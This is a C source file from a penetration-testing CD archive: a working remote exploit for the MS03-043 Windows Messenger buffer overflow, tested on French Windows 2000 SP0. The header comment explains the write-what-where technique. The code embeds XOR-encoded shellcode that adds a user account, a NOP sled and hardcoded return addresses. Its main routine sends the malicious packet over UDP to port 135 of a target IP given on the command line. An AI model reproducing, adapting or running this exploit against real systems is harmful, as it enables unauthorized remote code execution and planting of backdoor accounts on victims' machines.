home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / im / messenger / MS03-04.W2kFR.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  9.0 KB  |  219 lines
  1. /*******************************************************************/
  2. /*                [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]                      */
  3. /*              ---------------------------------------------------------------                     */
  4. /*                                                                                                                  */
  5. /*               This Sploit use the unhandledexceptionfilter to redirect                      */
  6. /*               the execution. When overflow occur we have :                                   */
  7. /*                                                                                                                  */
  8. /*               mov     eax,esi+8                                                            */
  9. /*               mov     ecx,esi+Ch                                                                     */
  10. /*               mov     dword ptr ds:[ecx],eax                                                     */
  11. /*                                                                                                                  */
  12. /*               so we control ecx and edx and we can write 4 bytes                            */
  13. /*               where we want.                                                                              */
  14. /*               If we try to write in a not writable memory zone, an                            */
  15. /*               excepetion is lauched and unhandledexceptionfilter too.                     */
  16. /*                                                 */
  17. /*               A part of unhandledexceptionfilter :                                                 */
  18. /*                                                                                                                  */
  19. /*              mov    eax, dword_0_77ECF44C(=where)                                      */
  20. /*        cmp    eax, ebx                     */
  21. /*        jz    short loc_0_77EA734C                                      */
  22. /*        push    esi                                                                 */
  23. /*        call    eax                                                                */
  24. /*                                 */
  25. /*               So we write the "WHAT"(=jmp esi+4Ch) at                                        */
  26. /*               the "WHERE"(=77EA734C here) and when the exception occur             */
  27. /*               the unhandledexceptionfilter is lauched so when call eax                    */
  28. /*               occur, it execute our code.                                                              */ 
  29. /*                                                                */
  30. /*               Thx Kotik who coded the proof of concept,and Metasploit                    */
  31. /*               for Shellcode and last but not least kralor,Scurt from Crpt                   */
  32. /*                                                                                                                  */
  33. /*               Tested on win2k FR SP0                                                                 */
  34. /*                                                                                                                  */
  35. /*                                                                                                                  */
  36. /*******************************************************************/
  37.  
  38. #ifdef _WIN32
  39. #include <winsock.h>
  40. #include <windows.h>
  41. #pragma comment (lib,"ws2_32")
  42. #else
  43. #include <sys/types.h>
  44. #include <netinet/in.h>
  45. #include <sys/socket.h>
  46. #include <stdio.h>
  47. #include <stdlib.h>
  48. #include <arpa/inet.h>
  49. #include <netdb.h>
  50. #include <sys/timeb.h>
  51. #include <string.h>
  52. #endif
  53. static unsigned char packet_header[] =
  54. "\x04\x00\x28\x00"
  55. "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  56. "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
  57. "\x4f\xb6\xe6\xfc"
  58. "\xff\xff\xff\xff" 
  59. "\xff\xff\xff\xff"
  60. "\xff\xff\xff\xff"
  61. "\xff\xff\xff\xff"
  62. "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
  63. "\x00\x00\xff\xff\xff\xff"
  64. "\xff\xff\xff\xff"
  65. "\x00\x00";
  66.  
  67.  
  68. unsigned char field_header[] =
  69. "\xff\xff\xff\xff"
  70. "\x00\x00\x00\x00"
  71. "\xff\xff\xff\xff";
  72.  
  73. unsigned char ShellCode[] = // XorDecode    23 bytes
  74. "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x96\xE2\xFA" 
  75. "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
  76. // AddUser:X Pass:X
  77. "\xf0\x17\x7a\x16\x96\x1f\x70\x7e\x21\x96\x96\x96\x1f\x90\x1f\x55"
  78. "\xc5\xfe\xe8\x4e\x74\xe5\x7e\x2b\x96\x96\x96\x1f\xd0\x9a\xc5\xfe"
  79. "\x18\xd8\x98\x7a\x7e\x39\x96\x96\x96\x1f\xd0\x9e\xa7\x4d\xc5\xfe"
  80. "\xe6\xff\xa5\xa4\xfe\xf8\xf3\xe2\xf7\xc2\x69\x46\x1f\xd0\x92\x1f"
  81. "\x55\xc5\xfe\xc8\x49\xea\x5b\x7e\x1a\x96\x96\x96\x1f\xd0\x86\xc5"
  82. "\xfe\x41\xab\x9a\x55\x7e\xe8\x96\x96\x96\x1f\xd0\x82\xa7\x56\xa7"
  83. "\x4d\xd5\xc6\xfe\xe4\x96\xe5\x96\xfe\xe2\x96\xf9\x96\xfe\xe4\x96"
  84. "\xf7\x96\xfe\xe5\x96\xe2\x96\xfe\xf8\x96\xff\x96\xfe\xfb\x96\xff"
  85. "\x96\xfe\xd7\x96\xf2\x96\x1f\xf0\x8a\xc6\xfe\xce\x96\x96\x96\x1f"
  86. "\x77\x1f\xd8\x8e\xfe\x96\x96\xca\x96\xc6\xc5\xc6\xc6\xc5\xc6\xc7"
  87. "\xc7\x1f\x77\xc6\xc2\xc7\xc5\xc6\x69\xc0\x86\x1d\xd8\x8e\xdf\xdf"
  88. "\xc7\x1f\x77\xfc\x97\xc7\xfc\x95\x69\xe0\x8a\xfc\x96\x69\xc0\x82"
  89. "\x69\xc0\x9a\xc0\xfc\xa6\xcf\xf2\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a"
  90. "\x3b\x1d\xd6\x9e\xc8\x54\x92\x96\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e"
  91. "\x1d\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97"
  92. "\x7d\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae"
  93. "\x76\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77"
  94. "\x1d\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92"
  95. "\x1d\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96";
  96.  
  97.  
  98. int main(int argc,char *argv[])
  99. {
  100.     int i, packet_size, fields_size, s,sp;
  101.     unsigned char packet[8192];
  102.     struct sockaddr_in addr;
  103.     // A few conditions :
  104.     // 0 <= strlen(from) + strlen(machine) <= 56
  105.     // max fields size 3992
  106.     char from[] = "RECCA";
  107.     char machine[] = "ZEUS";
  108.     char body[4096] = "*** MESSAGE ***";
  109. #ifdef _WIN32
  110.     WSADATA wsaData;
  111. #endif
  112.  
  113.     if(argc<2)
  114.        {
  115.     printf("\t     [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]\n");
  116.     printf("\t\t  www.coromputer.net && Undernet #coromputer\n");
  117.                 printf("---------------------------------------------------------------\n");
  118.                 printf("Tested on Windows 2000 French Sp0\n\n");
  119.                 printf("Downloaded from www.K-OTik.com\n");
  120.                 printf("Syntax : %s <ip>\n",argv[0]);
  121.                 return -1;
  122.          }
  123.  
  124. #ifdef _WIN32
  125.     if(WSAStartup(0x101,&wsaData)) {
  126.         printf("error: unable to load winsock.\n");
  127.                 return -1;
  128.         }
  129. #endif
  130.  
  131.     memset(&addr,0x00,sizeof(addr));
  132.     addr.sin_family = AF_INET;
  133.     addr.sin_addr.s_addr = inet_addr(argv[1]);
  134.     addr.sin_port = htons(135);
  135.  
  136.     memset(packet,0x00,sizeof(packet));
  137.     packet_size = 0;
  138.  
  139.     memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
  140.     packet_size += sizeof(packet_header) - 1;
  141.  
  142.     i = strlen(from) + 1;
  143.     *(unsigned int *)(&field_header[0]) = i;
  144.     *(unsigned int *)(&field_header[8]) = i;
  145.     memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
  146.     packet_size += sizeof(field_header) - 1;
  147.     strcpy(&packet[packet_size], from);
  148.     packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
  149.  
  150.     i = strlen(machine) + 1;
  151.     *(unsigned int *)(&field_header[0]) = i;
  152.     *(unsigned int *)(&field_header[8]) = i;
  153.     memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
  154.     packet_size += sizeof(field_header) - 1;
  155.     strcpy(&packet[packet_size], machine);
  156.     packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4
  157.  
  158.     printf("Max 'body' size (incl. terminal NULL char) = 
  159.                 %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
  160.     memset(body, 0x14, sizeof(body));
  161.     
  162.     
  163.     body[2263]=(char)0x90;
  164.     body[2264]=(char)0x90;
  165.     body[2265]=(char)0x90;
  166.     body[2266]=(char)0x90;
  167.     
  168.     body[2267]=(char)0x90;
  169.     body[2268]=(char)0x90;
  170.     
  171.     //jmp 8 bytes plus loing
  172.     body[2269]=(char)0xeb;
  173.     body[2270]=(char)0x08;
  174.     
  175.     //WHAT CRYPTSVC.dll Win2k sp0 FRENCH
  176.     body[2271]=(char)0x48;
  177.     body[2272]=(char)0x65;
  178.     body[2273]=(char)0x87;
  179.     body[2274]=(char)0x76;
  180.     
  181.     //WHERE win2k sp0 FRENCH
  182.     body[2275]=(char)0x4C;
  183.     body[2276]=(char)0xF4;
  184.     body[2277]=(char)0xEC;
  185.     body[2278]=(char)0x77;
  186.        
  187.     for(i=2279;i<2606;i++)
  188.         body[i]=ShellCode[i-2279];
  189.     
  190.     body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';
  191.  
  192.     i = strlen(body) + 1;
  193.     *(unsigned int *)(&field_header[0]) = i;
  194.     *(unsigned int *)(&field_header[8]) = i;
  195.     memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
  196.     packet_size += sizeof(field_header) - 1;
  197.     strcpy(&packet[packet_size], body);
  198.     packet_size += i;
  199.  
  200.     fields_size = packet_size - (sizeof(packet_header) - 1);
  201.     *(unsigned int *)(&packet[40]) = time(NULL);
  202.     *(unsigned int *)(&packet[74]) = fields_size;
  203.  
  204.     printf("Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) 
  205.                 + strlen(machine) + strlen(body), packet_size, fields_size);
  206.  
  207.  
  208.     if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
  209.         printf("error: unable to create socket\n");
  210.         return -1;
  211.         }
  212.  
  213.     if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
  214.         printf("error: unable to send packet\n");
  215.                 return -1;
  216.         }
  217.     return 0;
  218. }
  219.